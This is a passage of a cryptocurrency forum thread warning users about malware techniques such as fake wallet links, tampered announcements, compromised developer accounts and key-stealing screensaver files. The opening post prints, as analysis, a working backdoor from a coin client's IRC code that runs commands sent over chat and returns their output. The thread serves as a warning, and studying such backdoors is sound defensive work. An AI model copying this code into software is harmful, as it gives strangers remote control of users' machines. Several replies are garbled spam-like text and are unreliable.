The malware and cryptoware threat is absolutely there. The first thing you should do is regularly make a backup of your files.
Besides that I recommend Malwarebytes or Heimdal Security Pro software together with your antivirus program. Those two will actively ... uhh, how do you say it in English? Scan or real-time check your status.
When you are the unlucky one who’s Dropbox is encrypted by Cryptoware.. Dropbox can put back a backup until 30 days I believe. Don’t wait to long contacting them.
Topic: Beware of Increasingly Sophisticated Malware Infection Attempts - page 5. (Read 843901 times)
November 29, 2018, 12:50:08 AM
November 23, 2018, 09:08:03 PM
In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.
"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.
Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).
Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.
Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.
Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.
Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
here is the source code with macros resolved:
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.
OMG thank you for warning this kind of "hacking""latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.
Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).
Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.
Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.
Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.
Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
November 01, 2018, 06:56:30 PM
Thank you very much for the information! I didn't even know about such a infection ... I always try to sidestep various unfamiliar programs ... But for example, more and more conditions are encountered in bounty campaigns - download the wallet ...This is often alarming. Especially if the project does not inspire confidence, even after reading the white paper. Recently I found out that telegrams actively distribute links in chat rooms on behalf of well-known projects whose files contain a virus ... When you open a file, it loads, it is not just viewed in the chat.
October 28, 2018, 06:40:23 AM
Yes, attacks are getting more sophisticated.
There are also .SCR "screenshot" downloads being circulated in Telegram groups.
These are actually malware Screensaver EXE's which are able to scrape private keys.
Take Care out there
intsol
There are also .SCR "screenshot" downloads being circulated in Telegram groups.
These are actually malware Screensaver EXE's which are able to scrape private keys.
Take Care out there
intsol
October 27, 2018, 09:48:15 AM
Beware of various sites that are advertised all over the Internet. I once accidentally went to such a site and my computer began to attack bitcoin mining viruses. 3 days I was attacked by them
October 14, 2018, 02:25:56 PM
Any actions have to be entranced which are great sufficiency to keep safe your organizations to be hacked much as not to apply unnamed exe, apply of unix which look as if to be fewer vunarable to virus.
October 06, 2018, 11:36:11 AM
Basic , thanks representing your distribution . This data is extremely significant representing each fellow of this assembly . That's a extremely devil-may-care conflict , reason should anyone achieve that. We have to be deliberate of malware assails and have to study many almost how to keep off them.
October 04, 2018, 09:31:02 AM
I was one of the victims of this malware 'scams' who took all my Minexcoin. My anti-virus didn't alert me of any suspicious activity on my pc until I open my wallet with a zero balance. I just wish I did stake my MNX on the minex bank. 
October 04, 2018, 03:22:05 AM
I have experienced this such issue before. I have since quit utilizing bitcoin center as a wallet and not had a wallet that you have to download to your PC to utilize it since I think that its irritating to need to download the blockchain each time you sign into the program. Also it eats up alot of my data transmission that I am by all accounts coming up short on when the month's end approaches.
October 02, 2018, 11:59:17 AM
I base extremely worthy data hither representing myself. Instantly I recognise how to keep safe myself from afflicted -wishers. I thank the initiator of this theme and each those who join in in the talk and plam worthy data .
October 02, 2018, 05:40:10 AM
What I encountered (currently missing from the first post) is a copy of the ANN, but with a "team donation address" added at the bottom.
October 01, 2018, 11:35:14 AM
I thought that it should not bother me. But it turned out that my device is participating in mining, and I did not even suspect it. Be more careful.
How can this be possible, also how did you know it was mining?
And it's possible that its mining through any of those and the cause of it is you probably clicked and downloaded a malware that contains a mining software.
October 01, 2018, 11:08:12 AM
Now this topic is relevant. The progress and development of the crypto currency does not stand still, and this is what scammers are also inventing new ways of hacking. Therefore, you need to be careful and monitor security
September 29, 2018, 03:52:17 AM
More and more new harmful programs appear every day, so it was always that someone wants to steal someone else's money, it's because hackers can not catch the police.
September 28, 2018, 04:53:11 AM
I have likewise seen, I was not able download one of the digital currency centers as it was hailed up as being hurtful by norton web security! This is very likely with the majority of the cryptographic money centers as they are open source which amounts to nothing is shielding them from being hacked and set onto the digital currency's site keeping in mind the end goal to assault the PCs of numerous clients!
September 28, 2018, 04:47:51 AM
I thought that it should not bother me. But it turned out that my device is participating in mining, and I did not even suspect it. Be more careful.
How can this be possible, also how did you know it was mining?
And it's possible that its mining through any of those and the cause of it is you probably clicked and downloaded a malware that contains a mining software.
September 27, 2018, 07:30:08 PM
I thought that it should not bother me. But it turned out that my device is participating in mining, and I did not even suspect it. Be more careful.
How can this be possible, also how did you know it was mining?
September 25, 2018, 10:14:13 AM
What a shite. When you unknowingly paste their address and press send, you lose your precious coin forever. Just remember to always check the sending address twice.
September 21, 2018, 02:15:45 PM
Every day more and more new virus programs emerge that our electronic wallets are working programs and so on, otherwise the antiviruses would react as quickly and those harmful programs would appear.
September 21, 2018, 12:09:20 PM
Thanks representing this its a large support i get a associate got hacked and he dont recognise how he's been taxicab so aloof want recognise is thither whatever opportunity to avoid this similar opposed virus what desire you recommeded anitu virus to avoid this form of malware thanks its a large support .
Jump to: